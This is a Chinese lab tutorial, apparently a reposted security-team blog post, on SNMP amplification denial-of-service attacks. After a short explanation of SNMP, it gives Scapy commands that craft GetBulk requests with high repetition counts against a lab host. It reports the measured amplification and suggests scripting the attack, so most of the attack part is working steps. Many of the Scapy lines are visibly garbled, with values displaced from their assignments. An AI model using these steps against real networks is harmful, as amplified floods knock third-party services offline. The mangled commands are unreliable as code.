拒绝服务——SNMP 放大攻击
前言
本节学习SNMP 放大攻击
1、简介
SNMP(Simmple Network Management Protocol)
-
通过一台客户端机器向一个被管理的设备发出查询请求获取这台设备当前运行状态的检测等情况
-
服务端口UDP:(被监控设备)端口UDP 161为主动查询请求;162端口为监控方在固定时间内受监控端向监控端自动发送查询请求。
-
管理站(manager/客户端)、被管理设备(agent/服务端)
-
管理信息数据库(MIB) 是一个信息存储库,包含管理代理中的有关配置和性能的数据,按照不同分类,包含分属不同组的多个数据对象
-
每一个节点都有一个对象标识符(OID) 来唯一的标识一IETF定义便准的MIB库厂家自定义MIB库
攻击原理
-
请求流量小,查询结果返回流量大
-
结合伪造源地址实现攻击
2、尝试攻击
SNMP服务器win2003
安装SNMP
配置community为只读
IP:192.168.1.124
客户端kali
IP:192.168.1.116
scapy
#构造 IP 数据包 > i=IP()
"192.168.1.124" > i.dst=
> i.display()
#构造 UDP 数据包 > u=UDP()
161 > u.dport=
161 > u.sport=
#构造 SNMP 数据包 > s=SNMP()
> s.display()
#设置放大倍数 > b=SNMPbulk()
100 #重复次数,即倍数 > b.max_repetitions=
'1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))] #要查的内容 > b.varbindlist=[SNMPvarbind(oid=ASN1_OID(
> b.display()
> s.display()
#设置 SNMP 数据包 > s.PDU=b
> s.display()
#合成完整数据包 > r=(i/u/s)
> r.display()
#发送数据包 > sr1(r)
#发送 98 字节,返回 4534 字节的数据包
#测试放大200倍效果
200 > b.max_repetitions=
> s.PDU=b
> s.display()
> r=(i/u/s)
> r.display()
> sr1(r)
#发送 99 字节,返回 8894 字节
可类似之前写个脚本进行攻击
结语
为设置SNMP时敲响警钟
需要注意哪些东西
可参考
https://blog.csdn.net/Jack0610/article/details/88690365
https://blog.csdn.net/shangcx/article/details/71487274
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。
© Honker Security Commando
原文始发于微信公众号(中龙 红客突击队):拒绝服务——SNMP 放大攻击
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论